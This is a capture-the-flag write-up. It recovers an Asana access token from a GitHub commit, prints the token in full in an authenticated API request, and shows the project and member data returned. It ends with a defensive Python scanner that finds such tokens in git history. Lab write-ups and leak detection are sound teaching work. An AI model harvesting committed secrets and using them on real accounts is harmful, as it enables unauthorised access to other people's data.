I started by looking in the security evaluation workflow at https://github.com/keebersecuritygroup/security-evaluation-workflow. We see the commit here with an Asana secret: https://github.com/keebersecuritygroup/security-evaluation-workflow/commit/e76da63337cfabb12ea127af3f86168e9dd08428

Asana is a collaboration tool, so it makes sense that you wouldn't want this to be leaked online. I determined that I should go to the Asana API docs and headed to https://developers.asana.com/docs/projects. I know the cool kids use Linux to send requests to APIs, but I use reqbin.com :)

Anyways, I sent my request to the projects API like this:

```
GET /api/1.0/projects/1202152372766205 HTTP/1.1
Authorization: Bearer 1/1202152286661684:f136d320deefe730f6c71a91b2e4f7b1
Host: app.asana.com
Accept: application/json
```

And I find this!

```
{
  "data": [{
    "gid": "1202152372766205",
    "name": "Penetration Tests",
    "resource_type": "project"
  }, {
    "gid": "1202152393079570",
    "name": "testing jeffy boi",
    "resource_type": "project"
  }, {
    "gid": "1146735861322697",
    "name": "Sample Project",
    "resource_type": "project"
  }, {
    "gid": "1202202018838998",
    "name": "Work Requests",
    "resource_type": "project"
  }, {
    "gid": "1202202259907954",
    "name": "Demandes informatiques",
    "resource_type": "project"
  }, {
    "gid": "1202205585331206",
    "name": "dw",
    "resource_type": "project"
  }, {
    "gid": "1202206540231288",
    "name": "IT requests",
    "resource_type": "project"
  }, {
    "gid": "1202206499728568",
    "name": "1",
    "resource_type": "project"
  }]
}
```

I fetched the endpoint shown in https://developers.asana.com/docs/get-a-project with the penetration tests gid, and see this:

```
{
  "data": {
    "gid": "1202152372766205",
    "archived": false,
    "color": "dark-red",
    "completed": false,
    "completed_at": null,
    "created_at": "2022-04-20T02:44:40.333Z",
    "current_status": {
      "gid": "1202152372766224",
      "author": {
        "gid": "1202152286661684",
        "name": "flag{49305a2a9dcc503cb2b1fdeef8a7ac04}",
        "resource_type": "user"
      },
      "color": "yellow",
      "created_at": "2022-04-20T02:48:39.958Z",
      "created_by": {
        "gid": "1202152286661684",
        "name": "flag{49305a2a9dcc503cb2b1fdeef8a7ac04}",
        "resource_type": "user"
      },
      "modified_at": "2022-04-20T02:48:39.958Z",
      "resource_type": "project_status",
      "text": "Summary\n",
      "title": "Status Update - Apr 19"
    },
    "current_status_update": {
      "gid": "1202152372766224",
      "resource_type": "status_update",
      "resource_subtype": "project_status_update",
      "title": "Status Update - Apr 19"
    },
    "custom_fields": [],
    "default_view": "board",
    "due_on": null,
    "due_date": null,
    "followers": [{
      "gid": "1202152286661684",
      "name": "flag{49305a2a9dcc503cb2b1fdeef8a7ac04}",
      "resource_type": "user"
    }, {
      "gid": "1202152333653279",
      "name": "[email protected]",
      "resource_type": "user"
    }, {
      "gid": "1202152333696323",
      "name": "[email protected]",
      "resource_type": "user"
    }, {
      "gid": "1202152333724211",
      "name": "Stefan Atkison",
      "resource_type": "user"
    }, {
      "gid": "1202152333756260",
      "name": "[email protected]",
      "resource_type": "user"
    }],
    "is_template": false,
    "members": [{
      "gid": "1202152333653279",
      "name": "[email protected]",
      "resource_type": "user"
    }, {
      "gid": "1202152333696323",
      "name": "[email protected]",
      "resource_type": "user"
    }, {
      "gid": "1202152333724211",
      "name": "Stefan Atkison",
      "resource_type": "user"
    }, {
      "gid": "1202152333756260",
      "name": "[email protected]",
      "resource_type": "user"
    }, {
      "gid": "1202152286661684",
      "name": "flag{49305a2a9dcc503cb2b1fdeef8a7ac04}",
      "resource_type": "user"
    }],
    "modified_at": "2022-04-20T03:47:12.962Z",
    "name": "Penetration Tests",
    "notes": "",
    "owner": {
      "gid": "1202152286661684",
      "name": "flag{49305a2a9dcc503cb2b1fdeef8a7ac04}",
      "resource_type": "user"
    },
    "permalink_url": "https://app.asana.com/0/1202152372766205/1202152372766205",
    "public": true,
    "resource_type": "project",
    "start_on": null,
    "team": {
      "gid": "1202152372710258",
      "name": "IT",
      "resource_type": "team"
    },
    "workspace": {
      "gid": "1202152372710256",
      "name": "IT",
      "resource_type": "workspace"
    }
  }
}
```

Our flag is `flag{49305a2a9dcc503cb2b1fdeef8a7ac04}` - neat :)
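
The defender's side of this challenge, as an added example that is not part of the original write-up: a scan of `git log -p` output for tokens shaped like the one in the request above. The regex is an assumption inferred from that token's shape, and the sample log, commit ids and token are constructed placeholders.

```python
import re

# Assumption: pattern inferred from the shape of the token shown in this
# write-up ("1/<numeric user gid>:<32 hex chars>"), not from an Asana spec.
ASANA_PAT_RE = re.compile(r"\b1/\d{10,20}:[0-9a-f]{32}\b")

# Constructed sample of `git log -p` output; the token is a made-up placeholder.
SAMPLE_LOG = """\
commit 1111111111111111111111111111111111111111
    add workflow config
diff --git a/config.yml b/config.yml
--- a/config.yml
+++ b/config.yml
@@ -1,2 +1,3 @@
 name: evaluation
+asana_secret: 1/1234567890123456:0123456789abcdef0123456789abcdef
commit 2222222222222222222222222222222222222222
    remove secret from config
diff --git a/config.yml b/config.yml
--- a/config.yml
+++ b/config.yml
@@ -1,3 +1,2 @@
 name: evaluation
-asana_secret: 1/1234567890123456:0123456789abcdef0123456789abcdef
"""

def redact(token):
    """Keep only the non-secret user-id prefix so findings can be logged safely."""
    prefix, _, secret = token.partition(":")
    return f"{prefix}:{'*' * len(secret)}"

def find_leaked_tokens(log_text):
    """Return (commit, file, redacted token) for every added line holding a token."""
    findings, commit, path = [], None, None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ b/"):
            path = line[len("+++ b/"):]
        elif line.startswith("+") and not line.startswith("+++"):
            for m in ASANA_PAT_RE.finditer(line):
                findings.append((commit, path, redact(m.group())))
    return findings

if __name__ == "__main__":
    for commit, path, token in find_leaked_tokens(SAMPLE_LOG):
        print(f"{commit[:8]} {path}: {token}")
```

The second constructed commit deletes the secret, yet the scan still reports the first commit, because the token stays in history. A hit therefore calls for revoking the token, not only removing the line.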